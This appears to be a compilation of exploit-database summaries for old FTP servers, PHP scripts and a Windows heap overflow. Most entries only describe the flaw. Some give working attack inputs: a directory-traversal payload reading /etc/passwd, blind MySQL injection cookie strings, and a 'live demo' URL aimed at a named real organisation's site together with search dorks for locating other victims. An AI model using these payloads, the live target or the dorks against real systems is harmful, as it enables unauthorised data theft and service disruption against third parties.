This exploit is used to remotely DoS a RaidenFTPD V2.4 build 3620 server. It sends an evil string to the server which corrupts the heap and causes the server to crash.
A vulnerability in XM Easy Personal FTP Server 5.6.0 allows remote attackers to cause a denial of service (daemon crash) via a long argument to the NLST command.
Depending on the server configuration, it may not allow us to climb directories. The PoC is /index.php?d=[DIR]&f=[FILE], and the exploit is /index.php?d=../../../../../../../../../../../etc/&f=passwd or /index.php?d=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/&f=passwd. A live demo is http://www.bethesda.org.sg/resources/admin/index.php?d=%2e%2e%2f%2e%2e%2f%2e%2e%2f&f=index.php, and the dorks are "Powered by My PHP Indexer 1.0" and "priv8 :P".
True/false method for blind MySQL injection. Examples:
  javascript:document.cookie = "nlb3=7 and 1=1::96e79218965eb72c92a549dd5a330112"
  Response: you appear as logged in
  javascript:document.cookie = "nlb3=7 and 1=0::96e79218965eb72c92a549dd5a330112"
  Response: you appear as not logged in
  javascript:document.cookie = "nlb3=7 and (select substring(version(),1,1))=4::96e79218965eb72c92a549dd5a330112"
  Response: you appear as logged in if the MySQL version is 4
  javascript:document.cookie = "nlb3=7 and (select substring(version(),1,1))=5::96e79218965eb72c92a549dd5a330112"
  Response: you appear as logged in if the MySQL version is 5
GuildFTPd v0.999.8.11/v0.999.14 is vulnerable to a heap corruption vulnerability. An attacker can send a malicious CWD and LIST command to the server to cause a denial of service. The CWD command contains 124 '/.' characters and the LIST command contains 100 'X' characters. This exploit was published in 2008 by (x)dmnt.
A SQL injection vulnerability exists in Real-Estate-Scripts that allows an attacker to execute arbitrary SQL commands on the underlying database. The vulnerability is due to insufficient sanitization of user-supplied input in the 'cat' parameter of the 'index.php' script. An attacker can exploit it by sending a specially crafted HTTP request containing malicious SQL commands, and can use it to retrieve sensitive information such as usernames, passwords, and other confidential data.
This exploit allows an attacker to rewrite or create any file on the vulnerable server. The vulnerability exists due to insufficient sanitization of user-supplied input in the 'mode' and 'data' parameters of the 'globsy_edit.php' script. An attacker can exploit it by sending a specially crafted HTTP POST request to the vulnerable server.
The mini-pub 0.3 application is vulnerable to local file disclosure and command execution. An attacker can exploit this vulnerability by sending a crafted HTTP request to the vulnerable application. For example, an attacker can send a request to the vulnerable application with a malicious file name parameter to disclose the content of the file. Similarly, an attacker can send a request with a malicious command to execute the command on the vulnerable application.
EMR_SETICMPROFILEA Heap Overflow DOS is a vulnerability related to MS08-046. It causes Windows Explorer and Internet Explorer to crash and allows running of arbitrary code. It has been tested on Windows XP Professional SP2 with mscms.dll 5.1.2600.2709 and gdi32.dll 5.1.2600.2818.
An attacker can exploit this vulnerability by sending a crafted SQL query to the vulnerable parameter 'catid' in the 'index.php' script. This can allow the attacker to gain access to sensitive information such as usernames and passwords stored in the database.